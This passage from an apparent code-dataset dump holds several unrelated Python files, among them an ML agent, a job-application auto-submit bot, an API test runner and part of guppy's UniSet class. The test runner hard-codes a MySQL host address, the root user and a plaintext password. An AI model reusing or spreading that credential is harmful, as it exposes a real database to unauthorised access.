"""ending stuff, right now just shows how long script took to run"""
print('\nCompleted in {:.2f} seconds\n'.format(time.time() - self.start_time))
def main():
run = Pipal_Eater()
run.cls()
run.cmdargs()
run.read_file()
run.parse()
run.report()
run.end()
if __name__ == '__main__':
main()
|
994,214 | d3ac9336de395d1fda5f49b165199654a01693e1 | #!/usr/bin/python3
from subprocess import call, check_output
from sept_demo import init_ir_debian, cmd_to
import os
ain = "AIN1"
min_safe = 1250
ain_path = "/sys/devices/ocp.3/helper.15/" + ain
def main():
# Initialize the IR sensor pin (project sept_demo helper), then sample
# the ADC 1000 times.
init_ir_debian()
sense_loop(1000)
# Read the ADC `counter` times via the sysfs helper file and print each raw
# reading with a countdown.
# NOTE(review): shells out to `cat` for every sample; reading ain_path with
# open().read() would avoid a subprocess per iteration. The module-level
# min_safe constant is never used here.
def sense_loop(counter):
while counter > 0:
ir = int(check_output(["cat", ain_path]))
info = "voltage: " + str(ir)
counter -= 1
print(info, "(" + str(counter) + " to go)")
if __name__ == "__main__":
main()
|
994,215 | c02f3ec1acb54ee0aadbf9402bab913fd49a8776 | from selenium import webdriver
import pandas as pd
# Scrape the Petrobras dividends/JCP table and dump it to petrobras.csv.
browser = webdriver.Chrome()
browser.get('https://www.investidorpetrobras.com.br/acoes-dividendos-e-divida/dividendos-e-jcp/')
# Second div under the tabs body holds the table of interest.
# NOTE(review): find_element_by_css_selector was removed in Selenium 4;
# use browser.find_element(By.CSS_SELECTOR, ...) when upgrading.
tabela = browser.find_element_by_css_selector('.tabs-body > div:nth-child(2) > table')
tabela = tabela.get_attribute('outerHTML')
browser.close()
# Parse the captured HTML table with pandas and write it out.
pdtable = pd.read_html(tabela)[0]
pdtable.to_csv('petrobras.csv')
|
994,216 | 2b78c67e5d82ee04d1b01d3a5296ceb4f89f2d88 | # a + b + c = 1000, a ^2 + b ^2 = c ^2
# a,b,c > 0
# NOTE(review): Python-2 fragment (raw_input, print statement). It shadows
# the builtin `input` with the target sum N, then derives b from
# a + b + c = N and a^2 + b^2 = c^2; the expression below is algebraically
# equivalent to b = N(N - 2a) / (2(N - a)) but hard-codes N = 1000 via the
# constant 500.
import math
input = int(raw_input("BLOOP BLEEP: "))
a = 1
b = 1
c = 1
while a < input:
a +=1
b = (input * a - 500 * input)/(a - input)
c = math.sqrt(a ** 2 + b ** 2)
# NOTE(review): the parity tests below are tautologies -- for any number,
# either x or x+1 is even -- so the only effective filters are b > 0 and
# c > 0; with truncating integer division for b this can print
# non-solutions. Checking a*a + b*b == c*c with an exact integer c would
# be the correct filter.
if (b % 2 == 0 or (b + 1) % 2 == 0) and b > 0:
if (c % 2 == 0 or (c + 1) % 2 == 0) and c > 0:
print a * b * c
|
994,217 | 1224646c8bcb066c7d1f691e5b8a4573958e3b43 | import tensorflow as tf
from tensorflow.keras import layers
# Select p[i, action_ids[i]] for each row i: pair each batch index with its
# chosen action id, then gather those (row, col) entries in one gather_nd.
def gather_action_probabilities(p, action_ids):
gather_indices = tf.stack([
tf.range(tf.shape(action_ids)[0]),
action_ids
], -1)
return tf.gather_nd(p, gather_indices)
# PPO clipped-surrogate loss plus a value-function term weighted by c.
# `values` are the old value estimates used for the advantage; `rewards`
# serve as the return targets -- presumably already discounted (confirm
# against the caller).
def ppo_loss(new_values, values, p, p_old, action_ids, rewards, eps=0.2, c=1.0):
advantage = rewards - values
p = gather_action_probabilities(p, action_ids)
r = p / p_old  # probability ratio pi_new / pi_old per sample
# Elementwise min of the unclipped and clipped surrogate terms, taken
# across the stacked pair (axis 0 of the two-element list).
l_pg = tf.reduce_min([r * advantage, tf.clip_by_value(r, 1-eps, 1+eps) * advantage], axis=0)
l_v = tf.square(new_values - rewards)
return tf.reduce_mean(-l_pg + c*l_v)
# Joint actor-critic loss: softmax cross-entropy of the taken actions
# against the policy outputs plus MSE between rewards and state values.
# NOTE(review): softmax_cross_entropy_with_logits expects *logits*; the
# caller passes the agent's softmaxed policy -- confirm which is intended.
def ce_loss(action_p, state_v, action_ids, rewards):
policy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
tf.one_hot(action_ids, tf.shape(action_p)[1]),
action_p,
))
value_loss = tf.reduce_mean(tf.square(rewards - state_v))
return policy_loss + value_loss
# One gradient step over a batch of rollout data; returns the scalar loss.
def train(agent, optimizer, states, old_action_p, action_indices, state_values, rewards):
with tf.GradientTape() as t:
action_p, new_state_values = agent(states)
# loss = ce_loss(action_p, new_state_values, action_indices, rewards)
loss = ppo_loss(new_state_values, state_values, action_p, old_action_p, action_indices, rewards)
grads = t.gradient(loss, agent.trainable_variables)
optimizer.apply_gradients(zip(grads, agent.trainable_variables))
return loss
# Conv + dense policy/value network for a square board. call() returns
# (softmax policy over board_size**2 actions, tanh-squashed state value),
# or raw policy logits when raw_pi=True.
class Agent(tf.keras.Model):
def __init__(self, board_size, hidden_size=256, num_conv=5):
super(Agent, self).__init__()
self._flatten = layers.Flatten()
# num_conv same-padded 3x3 conv layers, each followed by batch norm.
self._convolutions = [
layers.Conv2D(filters=hidden_size, kernel_size=(3,3), padding='same', name='conv_%d' % i)
for i in range(num_conv)
]
self._conv_batch_norms = [
layers.BatchNormalization(name='bn_%d' % i)
for i in range(num_conv)
]
self._hidden1 = layers.Dense(2 * hidden_size, name='hidden1')
self._hidden1_bn = layers.BatchNormalization(name='hidden1_bn')
self._hidden2 = layers.Dense(hidden_size, name='hidden2')
self._hidden2_bn = layers.BatchNormalization(name='hidden2_bn')
# Policy head: one logit per board cell. Value head: scalar.
self._policy = layers.Dense(board_size ** 2, name='policy')
self._value = layers.Dense(1, name='value')
def call(self, state, raw_pi=False):
# NOTE(review): batch norm is invoked without a `training` flag, so
# Keras infers the phase; confirm this is intended for RL rollouts
# vs. gradient updates.
for i, conv_layer in enumerate(self._convolutions):
bn = self._conv_batch_norms[i]
state = tf.nn.relu(bn(conv_layer(state)))
state = self._flatten(state)
state = tf.nn.relu(self._hidden1_bn(self._hidden1(state)))
state = tf.nn.relu(self._hidden2_bn(self._hidden2(state)))
policy = self._policy(state)
value = tf.nn.tanh(self._value(state))
value = tf.squeeze(value, -1)
if raw_pi:
return policy, value
return tf.nn.softmax(policy), value
# def residual_conv2d(filters, kernel_size, activation=tf.nn.relu, name=None):
# conv1 = layers.Conv2D(
# filters,
# kernel_size,
# padding='same'
# )
# bn1 = layers.BatchNormalization()
# conv2 = layers.Conv2D(
# filters,
# kernel_size,
# padding='same'
# )
# bn2 = layers.BatchNormalization()
# return layers.Lambda(lambda x: activation(tf.add(x, bn2(conv2(activation(bn1(conv1(x))))))), name=name)
# class AgentV2(tf.keras.Model):
# def __init__(self, board_size, hidden_size=256, num_residual_conv=5, dropout=0.0):
# super(Agent, self).__init__()
# self._convolutions = [
# layers.Conv2D(filters=hidden_size, kernel_size=(3, 3), padding='same', activation=tf.nn.relu, name='input_conv')
# ] + [
# residual_conv2d(filters=hidden_size, kernel_size=(3,3), name='residual_conv_%d' % i)
# for i in range(num_residual_conv)
# ]
# self._flatten = layers.Flatten()
# self._dropout = layers.Dropout(dropout)
# self._policy_conv = layers.Conv2D(filters=2, kernel_size=(1,1), name='policy_conv')
# self._bn_policy = layers.BatchNormalization()
# self._value_conv = layers.Conv2D(filters=1, kernel_size=(1,1), name='value_conv')
# self._bn_value = layers.BatchNormalization()
# self._policy = layers.Dense(board_size ** 2, name='policy')
# self._value_hidden = layers.Dense(hidden_size, name='value')
# self._value = layers.Dense(1, name='value')
# def call(self, state, raw_pi=False):
# conv = state
# for conv_layer in self._convolutions:
# conv = self._dropout(conv_layer(conv))
# policy_conv = self._dropout(self._flatten(tf.nn.relu(self._bn_policy(self._policy_conv(conv)))))
# value_conv = self._dropout(self._flatten(tf.nn.relu(self._bn_value(self._value_conv(conv)))))
# policy = self._policy(policy_conv)
# value = self._dropout(tf.nn.relu(self._value_hidden(value_conv)))
# value = tf.nn.tanh(self._value(value))
# value = tf.squeeze(value, -1)
# if raw_pi:
# return policy, value
# return tf.nn.softmax(policy), value
|
994,218 | 6c5ec0bcfa8fcf3def625db3b76f0f991a6df153 | from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys
import os # to get the resume file
import time # to sleep
import get_links
# sample application links if we don't want to run get_links.py
# Hand-picked Lever (URL_l*) and Greenhouse (URL_g*) application links,
# used to exercise the form fillers without scraping Glassdoor first.
URL_l2 = 'https://jobs.lever.co/scratch/2f09a461-f01d-4041-a369-c64c1887ed97/apply?lever-source=Glassdoor'
URL_l3 = 'https://jobs.lever.co/fleetsmith/eb6648a6-7ad9-4f4a-9918-8b124e10c525/apply?lever-source=Glassdoor'
URL_l4 = 'https://jobs.lever.co/stellar/0e5a506b-1964-40b4-93ab-31a1ee4e4f90/apply?lever-source=Glassdoor'
URL_l6 = 'https://jobs.lever.co/verkada/29c66147-82ef-4293-9a6a-aeed7e6d619e/apply?lever-source=Glassdoor'
URL_l8 = 'https://jobs.lever.co/rimeto/bdca896f-e7e7-4f27-a894-41b47c729c63/apply?lever-source=Glassdoor'
URL_l9 = 'https://jobs.lever.co/color/20ea56b8-fed2-413c-982d-6173e336d51c/apply?lever-source=Glassdoor'
URL_g1 = 'https://boards.greenhouse.io/instabase/jobs/4729606002?utm_campaign=google_jobs_apply&utm_source=google_jobs_apply&utm_medium=organic'
# there's probably a prettier way to do all of this
# test URLs so we don't have to call get_links
URLS = [URL_g1, URL_l4, URL_l3, URL_l6, URL_l8, URL_l9]
# Fill in this dictionary with your personal details!
# Applicant profile consumed by both greenhouse() and lever().
JOB_APP = {
    "first_name": "Foo",
    "last_name": "Bar",
    "email": "test@test.com",
    "phone": "123-456-7890",
    "org": "Self-Employed",
    "resume": "resume.pdf",                 # PDF uploaded on Lever forms
    "resume_textfile": "resume_short.txt",  # plain text pasted into Greenhouse forms
    "linkedin": "https://www.linkedin.com/",
    "website": "www.youtube.com",
    "github": "https://github.com",
    "twitter": "www.twitter.com",
    "location": "San Francisco, California, United States",
    "grad_month": '06',
    "grad_year": '2021',
    "university": "MIT" # if only o.O
}
# Greenhouse has a different application form structure than Lever, and thus must be parsed differently
def greenhouse(driver):
    """Fill out and submit a Greenhouse job application form.

    driver -- a selenium WebDriver already pointing at a
              boards.greenhouse.io application page.
    Values come from the module-level JOB_APP dict. Optional fields that
    a given posting lacks are skipped silently (NoSuchElementException).
    """
    # basic info
    driver.find_element_by_id('first_name').send_keys(JOB_APP['first_name'])
    driver.find_element_by_id('last_name').send_keys(JOB_APP['last_name'])
    driver.find_element_by_id('email').send_keys(JOB_APP['email'])
    driver.find_element_by_id('phone').send_keys(JOB_APP['phone'])
    # Location autocomplete: choose the second dropdown suggestion.
    # This doesn't always work, so a pause gives the user time to fix it by hand.
    try:
        loc = driver.find_element_by_id('job_application_location')
        loc.send_keys(JOB_APP['location'])
        loc.send_keys(Keys.DOWN)
        loc.send_keys(Keys.DOWN)
        loc.send_keys(Keys.RETURN)
        time.sleep(2)  # give user time to manually input if this fails
    except NoSuchElementException:
        pass
    # Upload the resume as pasted text.
    driver.find_element_by_css_selector("[data-source='paste']").click()
    resume_zone = driver.find_element_by_id('resume_text')
    resume_zone.click()
    # FIX: the file is opened in text mode, so each line is already str;
    # the old line.decode('utf-8') raised AttributeError on Python 3.
    with open(JOB_APP['resume_textfile'], encoding='utf-8') as f:
        for line in f:
            resume_zone.send_keys(line)
    # add linkedin (postings disagree on capitalization)
    try:
        driver.find_element_by_xpath("//label[contains(.,'LinkedIn')]").send_keys(JOB_APP['linkedin'])
    except NoSuchElementException:
        try:
            driver.find_element_by_xpath("//label[contains(.,'Linkedin')]").send_keys(JOB_APP['linkedin'])
        except NoSuchElementException:
            pass
    # add graduation year (was hard-coded '2021'; now taken from JOB_APP)
    try:
        driver.find_element_by_xpath(f"//select/option[text()='{JOB_APP['grad_year']}']").click()
    except NoSuchElementException:
        pass
    # add university (was hard-coded 'Harvard'; now taken from JOB_APP)
    try:
        driver.find_element_by_xpath(f"//select/option[contains(.,'{JOB_APP['university']}')]").click()
    except NoSuchElementException:
        pass
    # add degree
    try:
        driver.find_element_by_xpath("//select/option[contains(.,'Bachelor')]").click()
    except NoSuchElementException:
        pass
    # add major
    try:
        driver.find_element_by_xpath("//select/option[contains(.,'Computer Science')]").click()
    except NoSuchElementException:
        pass
    # add website
    try:
        driver.find_element_by_xpath("//label[contains(.,'Website')]").send_keys(JOB_APP['website'])
    except NoSuchElementException:
        pass
    # add work authorization
    try:
        driver.find_element_by_xpath("//select/option[contains(.,'any employer')]").click()
    except NoSuchElementException:
        pass
    driver.find_element_by_id("submit_app").click()
# Handle a Lever form
def lever(driver):
    """Fill out and submit a Lever job application form.

    driver -- a selenium WebDriver on a jobs.lever.co posting page;
              the function first clicks through to the application form.
    Values come from the module-level JOB_APP dict; the resume file is
    uploaded last so Lever's autofill does not overwrite typed fields.
    """
    # navigate from the posting to the application page
    driver.find_element_by_class_name('template-btn-submit').click()
    # basic info
    full_name = f"{JOB_APP['first_name']} {JOB_APP['last_name']}"
    driver.find_element_by_name('name').send_keys(full_name)
    driver.find_element_by_name('email').send_keys(JOB_APP['email'])
    driver.find_element_by_name('phone').send_keys(JOB_APP['phone'])
    driver.find_element_by_name('org').send_keys(JOB_APP['org'])
    # socials
    driver.find_element_by_name('urls[LinkedIn]').send_keys(JOB_APP['linkedin'])
    driver.find_element_by_name('urls[Twitter]').send_keys(JOB_APP['twitter'])
    # Lever postings are inconsistent about the GitHub field's capitalization.
    try:
        driver.find_element_by_name('urls[Github]').send_keys(JOB_APP['github'])
    except NoSuchElementException:
        try:
            driver.find_element_by_name('urls[GitHub]').send_keys(JOB_APP['github'])
        except NoSuchElementException:
            pass
    driver.find_element_by_name('urls[Portfolio]').send_keys(JOB_APP['website'])
    # add university via the searchable dropdown
    try:
        driver.find_element_by_class_name('application-university').click()
        search = driver.find_element_by_xpath("//*[@type='search']")
        search.send_keys(JOB_APP['university'])
        search.send_keys(Keys.RETURN)
    except NoSuchElementException:
        pass
    # add how you found out about the company
    # (the old code bound the .click() result -- always None -- to a variable)
    try:
        driver.find_element_by_class_name('application-dropdown').click()
        driver.find_element_by_xpath("//select/option[text()='Glassdoor']").click()
    except NoSuchElementException:
        pass
    # Submit resume last so it doesn't auto-fill the rest of the form.
    # Use the configured filename instead of a hard-coded "resume.pdf".
    driver.find_element_by_name('resume').send_keys(
        os.path.join(os.getcwd(), JOB_APP['resume']))
    driver.find_element_by_class_name('template-btn-submit').click()
if __name__ == '__main__':
    # Scrape current job listings from Glassdoor, then dispatch each URL
    # to the matching form filler (Greenhouse or Lever).
    aggregatedURLs = get_links.getURLs()
    print(f'Job Listings: {aggregatedURLs}')
    print('\n')
    driver = webdriver.Chrome(executable_path='/usr/local/bin/chromedriver')
    for url in aggregatedURLs:
        print('\n')
        if 'greenhouse' in url:
            driver.get(url)
            try:
                greenhouse(driver)
                print(f'SUCCESS FOR: {url}')
            # NOTE(review): broad except hides every failure cause; at
            # minimum re-enable the FAILED print for debugging.
            except Exception:
                # print(f"FAILED FOR {url}")
                continue
        elif 'lever' in url:
            driver.get(url)
            try:
                lever(driver)
                print(f'SUCCESS FOR: {url}')
            except Exception:
                # print(f"FAILED FOR {url}")
                continue
        # i dont think this else is needed
        else:
            # print(f"NOT A VALID APP LINK FOR {url}")
            continue
        time.sleep(1) # can lengthen this as necessary (for captcha, for example)
    driver.close()
|
994,219 | 998d4c7a7c9ecfe2a756181481caf5fc9011a9de | #coding=utf-8
import os
import sys
sys.path.append("E:\\jiekou")
from data.get_data import Get_data
from base.demo import RunMain
from util.commen import CommonUtil
from data.dependdent_data import Deppenddent_data
from util.send_mail import SendMail
from redis import *
import json
from pymysql import *
from jsonpath_rw import jsonpath,parse
from util.operation_json import operationJson
class Run_Test():
    """Data-driven API test runner.

    Reads test cases from a spreadsheet (via Get_data), resolves
    inter-case dependencies through Redis, issues each HTTP request,
    optionally cross-checks MySQL, and writes pass/fail results back
    to the sheet.
    """
    def __init__(self):
        # sheet_id.conf contains a Python dict literal.
        # NOTE(review): eval() of file content is unsafe if the file can
        # be tampered with; ast.literal_eval would be safer.
        with open("./sheet_id.conf","rb") as f:
            conf_info=eval(f.read())
        sheet_id=conf_info["sheet_id"]
        self.data=Get_data(sheet_id=sheet_id)
        self.run=RunMain()
        self.com_utl=CommonUtil()
        self.send=SendMail()

    def go_on_run(self):
        """Execute every runnable case row and record its outcome."""
        pass_count=[]
        fail_count=[]
        cow_count=self.data.get_base_lines()
        for i in range(1,cow_count):
            case=self.data.get_caseid(i)
            # print("case是%s"%case)
            url=self.data.get_url(i)
            # print("url是%s" % url)
            method=self.data.get_request_method(i)
            # print("method是%s" % method)
            data=self.data.get_data_for_json(i)
            # print("data是%s" % data)
            headers = self.data.get_headers_for_json(i)
            # print("headers是%s" % headers)
            expect=self.data.get_expect_data(i)
            # print("except是%s" % expect)
            is_run=self.data.get_is_run(i)
            dep_case=self.data.is_depend(i)
            dep_two=self.data.is_dependTwo(i)
            data_fmdat=self.data.get_dat_formata(i)
            dep_cookie=self.data.is_dependCook(i)
            mysql_expect=self.data.except_mysql(i)
            if is_run=="yes":
                if dep_case != None:
                    if method == "post":
                        # Resolve the dependency ourselves via Redis
                        self.depend_data = Deppenddent_data()
                        self.depend_data.redis_isIn(dep_case)
                        dep_value=self.depend_data.get_data_key(i)
                        # print(" dep_values是%s" %dep_value)
                        dep_key=self.data.get_depent_files(i)
                        # print(" dep_key是%s" % dep_key)
                        dp_case= dep_key.split(":")[0]
                        if dp_case=="data":
                            data[dep_key.split(":")[1]]=dep_value
                        else:
                            headers["Authorization"]="Bearer "+str(dep_value)
                        if dep_two!=None:
                            self.depend_data = Deppenddent_data()
                            self.depend_data.redis_isIn(dep_two)
                            dep_value = self.depend_data.get_data_twokey(i)
                            dep_key = self.data.get_Twodepent_files(i)
                            dep_len=len(dep_key.split(":"))
                            header_ordata = dep_key.split(":")[0]
                            # Handles values that interface A returns but that interface B
                            # encodes differently: e.g. A returns False and B expects 1.
                            if header_ordata == "data":
                                if dep_len==2:
                                    data[dep_key.split(":")[1]] = dep_value
                                else:
                                    if dep_value==False:
                                        dep_value = 1
                                    else:
                                        dep_value = 2
                                    data[dep_key.split(":")[1]] = dep_value
                            else:
                                headers["Authorization"] = "Bearer " + dep_value
                        if dep_cookie!=None:
                            self.depend_data = Deppenddent_data()
                            self.depend_data.redis_isIn(dep_cookie)
                            # fetch the value from the depended-on interface A's response headers
                            dep_value = self.depend_data.get_data_keyCookie(i)
                            # the header key interface B expects
                            dep_key = self.data.get_CookDepent_files(i)
                            # set dep_key=dep_value into B's request headers
                            headers[dep_key] = dep_value
                        # instructor's approach to dependency resolution:
                        # self.depend_data = Deppenddent_data(depent_case)
                        # depend_response_data = self.depend_data.get_data_for_key(i)
                    else:
                        self.depend_data = Deppenddent_data()
                        self.depend_data.redis_isIn( dep_case)
                        dep_value = self.depend_data.get_data_key(i)
                        url=url.format(dep_value)
                elif dep_cookie!=None:
                    self.depend_data = Deppenddent_data()
                    self.depend_data.redis_isIn(dep_cookie)
                    # fetch the value from the depended-on interface A's response headers
                    dep_value = self.depend_data.get_data_keyCookie(i)
                    # the header key interface B expects
                    dep_key = self.data.get_CookDepent_files(i)
                    # set dep_key=dep_value into B's request headers
                    headers[dep_key]=dep_value
                # print("headers是%s" %headers)
                res=self.run.run_main(url,method,data_fmdat,data,headers)
                res_content=res[0]
                res_headers=res[1]
                res_content=json.dumps(res_content)
                # Cache this case's response body and headers in Redis so
                # later cases can depend on them.
                src = StrictRedis()
                src.set(case,res_content)
                case_headers=case+":headers"
                src.set(case_headers,str(res_headers))
                res_content=json.loads(res_content)
                print(res_content)
                if self.com_utl.is_contain(expect,res_content):
                    # decide whether database-level verification is also required
                    mysql_curso = self.data.rdom(i)
                    # print("mysql_curso 是%s" %mysql_curso)
                    if mysql_curso==None:
                        self.data.write_value(i,"pass")
                        pass_count.append(i)
                    else:
                        # NOTE(review): hard-coded production DB credentials in
                        # source control -- move to configuration/secrets.
                        conn = connect(host="47.98.179.27", port=3306, user="root", password="Jqdev.Com#123",
                                       database="shouji")
                        cs1 = conn.cursor()
                        count = cs1.execute(mysql_curso)
                        if count==int(mysql_expect):
                            self.data.write_value(i, "pass")
                            pass_count.append(i)
                        else:
                            self.data.write_value(i, count)
                            fail_count.append(i)
                else:
                    # primary expectation failed; try the secondary expectation if present
                    scend_except=self.data.get_sce_excepet(i)
                    if scend_except==None:
                        res_content=str(res_content)
                        self.data.write_value(i, res_content)
                        fail_count.append(i)
                    else:
                        if self.com_utl.is_contain(scend_except, res_content):
                            self.data.write_value(i, "pass")
                            pass_count.append(i)
                        else:
                            self.data.write_value(i, res_content)
                            fail_count.append(i)
        #self.send.send_main(pass_count,fail_count)
if __name__=="__main__":
run=Run_Test()
run.go_on_run() |
994,220 | a55d42e485cd5fd921273d029ecafc86975ee353 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.3 on 2017-04-15 08:05
from django.db import migrations
class Migration(migrations.Migration):
    """No-op migration: keeps the migration history chain intact
    without changing the schema (operations is empty)."""

    dependencies = [
        ('resume', '0014_auto_20170413_1507'),
        # ('resume', '0014_remove_resume_hireable'),
    ]

    operations = [
    ]
|
994,221 | 9cb2721c40f8db799579b01f31d58a8054e49439 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
import re
import time
import sys
def detectGPU_exec(exec_filename, sleep_second):
    """Poll `nvidia-smi` until a TITAN Xp in performance state P0 appears,
    then launch `exec_filename` pinned to that GPU; retry until the
    command exits with status 0.

    exec_filename -- path of the python script to run.
    sleep_second  -- seconds to wait between polls.

    NOTE(review): exec_filename is interpolated into a shell command via
    os.system -- never pass untrusted input here.
    """
    # Matches "<cuda_idx> TITAN Xp ... P<perf_state>" pairs in the
    # newline-stripped nvidia-smi output. Raw string + precompiled once
    # (the old code rebuilt a non-raw "\d" pattern on every iteration).
    gpu_pattern = re.compile(r"(\d) TITAN Xp.*?P(\d)")
    exec_return = None
    while exec_return is None:  # was `== None`
        gpustatus = os.popen("nvidia-smi").read().replace("\n", "")
        for cuda_idx, perf_status in gpu_pattern.findall(gpustatus):
            # Original logic treats performance state P0 as "available";
            # presumably the idle cards report P0 here -- TODO confirm,
            # since P0 conventionally means maximum-performance state.
            if perf_status == '0':
                exec_return = os.system("CUDA_VISIBLE_DEVICES=%d python %s" % (int(cuda_idx), exec_filename))
                if exec_return != 0:
                    print("error_id:%d"%(exec_return))
                    exec_return = None  # failed: fall through and poll again
                break  # attempt at most one GPU per polling round
        time.sleep(sleep_second)
if __name__=="__main__":
exec_filename = sys.argv[1]
sleep_second = sys.argv[2]
detectGPU_exec(exec_filename, int(sleep_second)) |
994,222 | 8fd41dc279a438251eff5690a9035756b6e748af | from syml_schemas.service.schemas import SymlSchemasService
if __name__ == '__main__':
    # Entry point: start the schemas service listening on a Unix socket.
    service = SymlSchemasService()
    service.unix_serve()
|
994,223 | 715e0aa3e76a367113d081d420003ef9c03df359 | from functools import reduce
from guppy.etc.Descriptor import property_exp
class UniSet(object):
    """Abstract base class for Heapy's symbolic 'universal' sets.

    Almost every operation is delegated to ``self.fam`` (a 'family'
    object) through its ``c_*`` methods; subclasses choose semantics by
    choosing their family. ``_hiding_tag_`` keeps these bookkeeping
    objects out of the heap views they describe.
    """
    __slots__ = '_hiding_tag_', 'fam', '_origin_'
    _help_url_ = 'heapy_UniSet.html#heapykinds.UniSet'
    _instahelp_ = ''
    _doc_nodes = """nodes: ImmNodeSet
The actual objects contained in x. These are called nodes because
they are treated with equality based on address, and not on the
generalized equality that is used by ordinary builtin sets or dicts."""

    def __and__(self, other):
        """
        Return the intersection of self and other.
        """
        return self.fam.c_binop('and', self, other)
    __rand__ = __and__

    def __call__(self, *args, **kwds): return self.fam.c_call(self, args, kwds)

    def __contains__(self, other):
        """
        Return True if other is a member of self, False otherwise.
        """
        return self.fam.c_contains(self, other)

    def __eq__(self, other):
        """
        Return True if self contains the same elements as other,
        False otherwise."""
        # Mutual inclusion; avoids needing a family-level equality primitive.
        return self <= other and self >= other

    def __hash__(self):
        """
        Return an hash based on the kind of the set of self and
        the addresses of its elements, if any.
        """
        return self.fam.c_hash(self)

    def __invert__(self):
        """
        Return the complement of self.
        """
        return self.fam.c_unop('invert', self)

    def __ge__(self, other):
        """
        Return True if self is a superset of (and may be equal to) other,
        False otherwise.
        """
        if self is other:
            return True
        if not isinstance(other, UniSet):
            other = self.fam.c_uniset(other)
        return self.fam.c_ge(self, other)

    def __gt__(self, other):
        """
        Return True if self is a strict (may not be equal to) superset of other.
        False otherwise.
        """
        return self >= other and not self <= other

    def __getattr__(self, other):
        """
        Get family-specific attribute.
        """
        # Evaluated inside the View context so heap state stays consistent.
        return self.fam.mod.View.enter(lambda: self.fam.c_getattr(self, other))

    def __le__(self, other):
        """
        Return True if self is a subset of (and may be equal to) other,
        False otherwise.
        """
        if self is other:
            return True
        if not isinstance(other, UniSet):
            other = self.fam.c_uniset(other)
        return self.fam.c_le(self, other)

    def __lshift__(return_spec, argument_spec):
        """
        <<This is about to change, does not work as one may expected.
        Nov 19 2005. >>>
        Return a 'mapping' set, which may be used for specification and test
        purposes. It implements the syntax:
            return_spec << argument_spec
        The elements of the set returned are the callable objects that return
        values in return_spec, when called with arguments according to
        argument_spec. The return_spec may be any kind of sets that can test
        for element containment. The argument_spec may be a set or a tuple. If
        it is a set, it should be able to generate some examples, to allow the
        mapping to be tested. When argument_spec is a set, the mapping will
        have a single argument. Any number of arguments may be specified using
        an argument_spec which is a tuple. The arguments are then specified
        with sets, that should be able to generate examples. Special features
        of the mapping such as optional arguments may be specified in the same
        way as when using the 'mapping' function in the Spec.py module.
        """
        return return_spec.fam.c_lshift(return_spec, argument_spec)

    def __lt__(self, other):
        """
        Return True if self is a strict (may not be equal to) subset of other,
        False otherwise.
        """
        return self <= other and not self >= other

    def __mul__(self, other):
        """
        Return the cartesian product of self and other, which is the set of
        pairs where the first element is a member of self and the second
        element is a member of other.
        NOTE: Unlike what one might expect from the way the cartesian product
        may be defined mathematically, the operation as implemented here is
        nonassociative, i.e.
            a*b*c == (a*b)*c != a*(b*c)
        In the mathematical case, a*b*c would be a set of triples, but here it
        becomes a set of pairs with the first element in (a*b) and the second
        element in c.
        To create sets of triples etc. the cprod() factory function in Spec.py
        could be used directly.
        """
        if not isinstance(other, UniSet):
            other = self.fam.c_uniset(other)
        return self.fam.c_mul(self, other)

    def __ne__(self, other):
        """
        Return True if self does not equal other,
        False otherwise. See also: __eq__.
        """
        return not self == other

    def __bool__(self):
        """
        Return True if self contains some element,
        False otherwise.
        """
        return self.fam.c_nonzero(self)

    def __or__(self, other):
        """
        Return the union of self and other.
        """
        return self.fam.c_binop('or', self, other)
    __ror__ = __or__

    def __repr__(self):
        """
        Return a string representing self. This is usually the same string
        as from __str__.
        """
        return self.fam.c_repr(self)

    def __str__(self):
        """
        Return a string representing self. The string is usually the same as the .brief
        attribute, but a major exception is the IdentitySet class.
        """
        return self.fam.c_str(self)

    def __sub__(self, other):
        """
        Return the assymetrical set difference. That is, the set of elements
        in self, except those that are in others.
        """
        if not isinstance(other, UniSet):
            other = self.fam.c_uniset(other)
        return self.fam.c_sub(self, other)

    def __rsub__(self, other):
        """
        Return the assymetrical set difference. That is, the
        set of elements in other, except those that are in self.
        This is like __sub__ except it handles the case when the left
        argument is not a UniSet (but convertible to a UniSet).
        """
        if not isinstance(other, UniSet):
            other = self.fam.c_uniset(other)
        return other.fam.c_sub(other, self)

    def __xor__(self, other):
        """
        Return the symmetrical set difference. That is, the set of elements
        that are in one of self or other, but not in both.
        """
        if not isinstance(other, UniSet):
            other = self.fam.c_uniset(other)
        return self.fam.c_xor(self, other)
    __rxor__ = __xor__

    brief = property_exp(lambda self: self.fam.c_get_brief(self),
                         doc="""\
A string representation of self, which is brief relative to the
representation returned by __str__ and __repr__. (In many cases it is
the same - both are then brief - but for IdentitySet objects the brief
representation is typically much shorter than the non-brief one.)"""
                         )

    def _get_help(self):
        return self.fam.mod._root.guppy.doc.help_instance(self)

    doc = property_exp(lambda self: self.fam.mod._root.guppy.etc.Help.dir(self))

    def get_ckc(self):
        # Get low-level classification information, where available.
        # Returns a tuple (classifier, kind, comparator)
        return self.fam.c_get_ckc(self)

    def _derive_origin_(self, doc):
        """
        Return information about the 'origin' of the set. This was intended to be
        used for specification purposes - is experimental, noncomplete, temporary.
        """
        return self.fam.c_derive_origin(self, doc)

    def disjoint(self, other):
        """
        Return True if self and other are disjoint sets, False otherwise. This
        is equivalent to calculating
            (self & other) == Nothing
        but may be implemented more efficiently in some cases.
        """
        return self.fam.c_disjoint(self, other)

    def get_examples(self, env):
        """
        Return an iterable object or an iterator, which provides someexamples
        of the elements of self. (A minimum of 2 examples should normally be
        provided, but it may depend on some test configuration options.)
        This is used for automatic test generation from specifications. The
        env argument is according to specification of TestEnv in Spec.py,
        """
        return self.fam.c_get_examples(self, env)

    def get_render(self):
        """
        Return a function that may be used to render the representation of the
        elements of self. This is mainly intended for internal representation
        support.
        The function returned depends on the kind of elements self
        contains. The rendering function is choosen so that it will be
        appropriate, and can be used safely, for all objects of that kind.
        For the most general kind of objects, the rendering function will only
        return an address representation. For more specialized kinds, the
        function may provide more information, and can be equivalent to the
        builtin repr() when the kind is narrow enough that it would work for
        all elements of that kind without exception.
        """
        return self.fam.c_get_render(self)

    def test_contains(self, element, env):
        """
        Test if self contains the element object. This is used mainly for
        internal use for automatic (experimental) testing of specifications.
        The env argument is according to specification of TestEnv in Spec.py.
        It provides support for things that depends on the specific test
        situation, such as a test reporting protocol. If test_contains did
        find the element to be contained in self, the method will return
        (usually True). But if the element was not contained in self, the
